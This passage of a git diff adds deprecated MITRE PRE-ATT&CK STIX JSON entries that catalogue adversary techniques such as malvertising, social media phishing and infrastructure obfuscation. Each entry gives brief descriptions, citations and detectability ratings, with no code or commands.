Jekyll on iOS) (Citation: Fruit vs Zombies)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1393", + "external_id": "T1393" + }, + { + "source_name": "Android Bouncer", + "description": "Jon Oberheide and Charlie Miller. (2012). DISSECTING THE ANDROID BOUNCER. Retrieved April 12, 2017." + }, + { + "source_name": "Adventures in BouncerLand", + "description": "Nicholas J. Percoco and Sean Schulte. (2012). Adventures in BouncerLand. Retrieved April 12, 2017." + }, + { + "source_name": "Jekyll on iOS", + "description": "Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke Lee. (2013). Jekyll on iOS: When Benign Apps Become Evil. Retrieved April 12, 2017." 
+ }, + { + "source_name": "Fruit vs Zombies", + "description": "Claud Xiao. (2016). Fruit vs Zombies: Defeat Non-jailbroken iOS Malware. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The app store operators (e.g., Apple and Google) may detect the attempts, but it would not be observable to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can submit code remotely using throwaway accounts, although a registration fee may need to be paid for each new account (e.g., $99 for Apple and $25 for Google Play Store).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1170", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--d72c0bc0-3007-418c-842c-328027ebdbc1.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--d72c0bc0-3007-418c-842c-328027ebdbc1.json new file mode 100644 index 0000000000000000000000000000000000000000..a714b70b9c608e3b81d48af290bae45b648508b0 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--d72c0bc0-3007-418c-842c-328027ebdbc1.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--a2cab606-26d4-4b8d-be50-1ce71350d7ec", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--d72c0bc0-3007-418c-842c-328027ebdbc1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Deploy exploit using advertising", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nExploits spread through advertising (malvertising) involve injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages. (Citation: TPMalvertising)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1380", + "url": "https://attack.mitre.org/techniques/T1380" + }, + { + "description": "Michael Mimoso. (2015, March 30). AD NETWORKS RIPE FOR ABUSE VIA MALVERTISING. Retrieved March 9, 2017.", + "source_name": "TPMalvertising" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:18:44.045Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1157", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can deploy exploits via malvertising using multiple mechanisms. 
Such mechanisms include an image ad that is infected, redirection, or using social engineering to get the end user to install the malicious software themselves.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Although some commercial technologies are being advertised which claim to detect malvertising, it largely spreads unknowingly because it doesn't always require an action by a user.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59.json new file mode 100644 index 0000000000000000000000000000000000000000..8df91365f8c1c947c38461f3d4c3643d0cc065da --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--1cb8d739-1c28-4a12-a60f-5ce6d0bec369", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire or compromise 3rd party signing certificates", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1310).\n\nCode signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1310", + "external_id": "T1310" + }, + { + "description": "Brad Arkin. (2012, September 27). Inappropriate Use of Adobe Code Signing Certificate. Retrieved March 28, 2017.", + "source_name": "Adobe Code Signing Cert" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1087", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "It is trivial to purchase code signing certificates within an organization; many exist and are available at reasonable cost. 
It is complex to factor or steal 3rd party code signing certificates for use in malicious mechanisms", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know what certificates an adversary acquires from a 3rd party. Defender will not know prior to public disclosure if a 3rd party has had their certificate compromised.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6.json new file mode 100644 index 0000000000000000000000000000000000000000..748e490e92e180030cd578422beae38db13bf663 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--94eed214-90f9-47e7-91a7-774bcc06ce32", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1309).\n\nObfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: LUCKYCAT2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1309", + "external_id": "T1309" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Difficult, but defender is well aware of technique and attempts to find discrepancies.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has a variety of solutions, ranging in difficulty, that can be employed (e.g., BGP hijacking, tunneling, reflection, multi-hop, etc.)\nAdversary can also use misattributable credentials to obtain servers, build environment, [https://aws.amazon.com Amazon Web Services] (AWS) accounts, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1086", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e754fa49-2db1-416b-92db-7f886decd099.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e754fa49-2db1-416b-92db-7f886decd099.json new file mode 100644 index 0000000000000000000000000000000000000000..cddb0de50f6607274f5b8daa096b1466f650d295 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e754fa49-2db1-416b-92db-7f886decd099.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--5021d1cb-9341-4660-bb9f-ec7caeb98cdb", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--e754fa49-2db1-416b-92db-7f886decd099", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Generate analyst intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1234).\n\nAnalysts may receive Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from leadership or key decision makers and generate intelligence requirements to articulate intricacies of information required on a topic or question. (Citation: Herring1999)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1234", + "external_id": "T1234" + }, + { + "source_name": "Herring1999", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. 
May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1011", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e8471f43-2742-4fd7-9af7-8ed1330ada37.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e8471f43-2742-4fd7-9af7-8ed1330ada37.json new file mode 100644 index 0000000000000000000000000000000000000000..1f0a99582bd0a9d9b648ea90a42379aa6a4e9d20 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e8471f43-2742-4fd7-9af7-8ed1330ada37.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--debeaddf-809f-4c68-8946-83015fcfbe22", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--e8471f43-2742-4fd7-9af7-8ed1330ada37", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Upload, install, and configure software/tools", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1362).\n\nAn adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1362", + "external_id": "T1362" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + }, + { + "source_name": "RedOctober", + "description": "GReAT. (2013, January 17). \u201cRed October\u201d. Detailed Malware Description 4. Second Stage of Attack. Retrieved March 7, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be observable to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], VPS providers).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1139", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eacadff4-164b-451c-bacc-7b29ebfd0c3f.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eacadff4-164b-451c-bacc-7b29ebfd0c3f.json new file mode 100644 index 0000000000000000000000000000000000000000..b51efcb29e8b4c042fb2f2e291db1f166911a1ee --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eacadff4-164b-451c-bacc-7b29ebfd0c3f.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--23f6006b-7625-4529-ac3f-b75bdda6c3fd", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--eacadff4-164b-451c-bacc-7b29ebfd0c3f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create infected removable media", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1355).\n\nUse of removable media as part of the Launch phase requires an adversary to determine type, format, and content of the media and associated malware. (Citation: BadUSB)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1355", + "external_id": "T1355" + }, + { + "source_name": "BadUSB", + "description": "Security Research labs. (n.d.). BadUSB Exposure. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Several exploit repositories and tool suites exist for re-use and tailoring.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1132", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d.json new file mode 100644 index 0000000000000000000000000000000000000000..e73e2f230755afd733e4926c85d0bf17942f8c8e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--f3e76a5f-e74e-419a-bef0-8e0d0c7c2805", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Friend/Follow/Connect to targets of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1364).\n\nA form of social engineering designed build trust and to lay the foundation for future interactions or attacks. (Citation: BlackHatRobinSage)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1364", + "external_id": "T1364" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1141", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Connecting with \"friends\" is a fundamental requirement for social media - without it, social media is worthless. 
An adversary can easily create a profile and request targets to validate the requests.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Users have the ability to detect and report non-authenticated individuals requesting to follow, friend or connect to a target. However the rigidity in validating the users is not typically followed by standard users.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eb517589-eefc-480e-b8e3-7a8b1066f6f1.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eb517589-eefc-480e-b8e3-7a8b1066f6f1.json new file mode 100644 index 0000000000000000000000000000000000000000..7ab8d09e710eb79bfadcde1646c82472dec50216 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eb517589-eefc-480e-b8e3-7a8b1066f6f1.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--91ff5cae-f97e-44ab-9687-bbd901e2ecc4", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--eb517589-eefc-480e-b8e3-7a8b1066f6f1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Targeted social media phishing", + "description": "**This technique has been deprecated. Please use [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003).**\n\nSending messages through social media platforms to individuals identified as a target. These messages may include malicious attachments or links to malicious sites or they may be designed to establish communications for future actions. (Citation: APT1) (Citation: Nemucod Facebook)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1366", + "url": "https://attack.mitre.org/techniques/T1366" + }, + { + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017.", + "source_name": "APT1" + }, + { + "description": "Bart Blaze. (2016, November 20). Nemucod downloader spreading via Facebook. 
Retrieved March 28, 2017.", + "source_name": "Nemucod Facebook" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:27:43.972Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1143", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Sending messages to individuals identified as a target follows normal tradecraft for using social media.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Extremely hard to identify (in the launch phase) what message via social media is hostile versus what is not. Increased use of encrypted communications increases the difficulty average defender's have in detecting use of this technique.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ec739e26-d097-4804-b04a-54dd81ff11e0.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ec739e26-d097-4804-b04a-54dd81ff11e0.json new file mode 100644 index 0000000000000000000000000000000000000000..a615d5c9dfd7a47b33c78b60ac15ff43d932516b --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ec739e26-d097-4804-b04a-54dd81ff11e0.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--a2b22710-c05b-415c-ac2a-730ac462cc4b", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--ec739e26-d097-4804-b04a-54dd81ff11e0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create strategic plan", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1231).\n\nStrategic plans outline the mission, vision, and goals for an adversary at a high level in relation to the key partners, topics, and functions the adversary carries out. (Citation: KPMGChina5Year) (Citation: China5YearPlans) (Citation: ChinaUN)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1231", + "external_id": "T1231" + }, + { + "source_name": "KPMGChina5Year", + "description": "KPMG. (2016, October 19). China\u2019s 13th Five-Year Plan signals a potential new era of Sino-foreign cooperation, finds KPMG report. Retrieved March 2, 2017." + }, + { + "source_name": "China5YearPlans", + "description": "Wikipedia contributors. (2017, February 8). Five-year plans of China. Retrieved March 2, 2017." + }, + { + "source_name": "ChinaUN", + "description": "People's Republic of China. (2015, November). China's 13th Five-Year Plan. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. 
Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1008", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ee40d054-6e83-4302-88dc-a3af98821d8d.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ee40d054-6e83-4302-88dc-a3af98821d8d.json new file mode 100644 index 0000000000000000000000000000000000000000..82ad68f7f7b5a7e9f086ee438835a829e214af62 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ee40d054-6e83-4302-88dc-a3af98821d8d.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--11c80d4b-7870-46d3-a164-93cc70d754c9", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--ee40d054-6e83-4302-88dc-a3af98821d8d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze social and business relationships, interests, and affiliations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1295).\n\nSocial media provides insight into the target's affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1295", + "external_id": "T1295" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public sources are external to the defender's organization. 
Some social media sites have an option to show you when users are looking at your profile, but an adversary can evade this tracking depending on how they conduct the searches.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Social and business relationship information for an individual can be found by examining their social media contacts (e.g., [https://www.facebook.com Facebook] and [https://www.linkedin.com LinkedIn]). Social media also provides insight into the target's affiliations with groups and organizations. Finally, certification information can explain their technical associations and professional associations.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1072", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ef0f816a-d561-4953-84c6-2a2936c96957.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ef0f816a-d561-4953-84c6-2a2936c96957.json new file mode 100644 index 0000000000000000000000000000000000000000..1a5fc02d13533cfe6a7837351b6fb5bf9e5c40f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ef0f816a-d561-4953-84c6-2a2936c96957.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--3c6ed201-43d8-4815-a503-b92f85ce1102", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--ef0f816a-d561-4953-84c6-2a2936c96957", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Discover target logon/email address format", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1255).\n\nEmail addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example if a known email address is first.last@company.com it is likely that others in the company will have an email in the same format. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1255", + "external_id": "T1255" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Easily determined and not intended to be protected information. Publicly collected and shared repositories of email addresses exist.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Scraping of known email addresses from the target will likely reveal the target standard for address/username format. 
This information is easily discoverable.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1032", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ef6197fd-a58a-4006-bfd6-1d7765d8409d.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ef6197fd-a58a-4006-bfd6-1d7765d8409d.json new file mode 100644 index 0000000000000000000000000000000000000000..f0f788fc812898003ea6abbfdc90d4daafdc6596 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ef6197fd-a58a-4006-bfd6-1d7765d8409d.json 
